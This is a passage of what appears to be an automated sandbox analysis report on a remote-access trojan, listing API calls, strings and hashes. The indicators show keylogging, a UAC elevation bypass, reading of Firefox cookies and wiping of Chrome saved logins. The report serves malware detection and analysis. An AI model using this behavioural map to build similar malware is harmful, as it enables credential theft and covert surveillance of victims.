                                                                                • GetLastError.KERNEL32(?,?,?,?,?,34,004752F0,00000001), ref: 0041C44D
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C463
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C46A
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C473
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                • String ID: 34
                                                                                • API String ID: 2341273852-837682457
                                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-3166923314
                                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: bd90adb3c9ffda68c4d3d743e1fab383d2d9aba86fe3d43c12d646017195f98b
                                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                • Opcode Fuzzy Hash: bd90adb3c9ffda68c4d3d743e1fab383d2d9aba86fe3d43c12d646017195f98b
                                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID: JD$JD$JD
                                                                                • API String ID: 745075371-3517165026
                                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 1164774033-405221262
                                                                                • Opcode ID: 78e91e1412a60729a935b4267de3637b6f1e72dbfc3822a78d199d5eb66ad251
                                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                • Opcode Fuzzy Hash: 78e91e1412a60729a935b4267de3637b6f1e72dbfc3822a78d199d5eb66ad251
                                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$CreateFirstNext
                                                                                • String ID: 8SG$PXG$PXG$p54$NG
                                                                                • API String ID: 341183262-873243826
                                                                                • Opcode ID: eb4b6eba06b30b548788c5b2eb1276ea41de61378780079a625ef76f4ca5169a
                                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                • Opcode Fuzzy Hash: eb4b6eba06b30b548788c5b2eb1276ea41de61378780079a625ef76f4ca5169a
                                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetMessageA.USER32 ref: 0040A376
                                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                                • DispatchMessageA.USER32 ref: 0040A390
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                • API String ID: 3219506041-952744263
                                                                                • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                • String ID:
                                                                                • API String ID: 1888522110-0
                                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                • API String ID: 2127411465-314212984
                                                                                • Opcode ID: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                • Opcode Fuzzy Hash: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00449292
                                                                                • _free.LIBCMT ref: 004492B6
                                                                                • _free.LIBCMT ref: 0044943D
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                • _free.LIBCMT ref: 00449609
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 314583886-0
                                                                                • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                APIs
                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                • API String ID: 1589313981-2876530381
                                                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                                Strings
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                • UserProfile, xrefs: 0040BA59
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                • API String ID: 2018770650-1062637481
                                                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 3534403312-3733053543
                                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                • String ID:
                                                                                • API String ID: 1824512719-0
                                                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 276877138-0
                                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                APIs
                                                                                • FindResourceA.KERNEL32 ref: 0041B54A
                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                Memory Dump Source
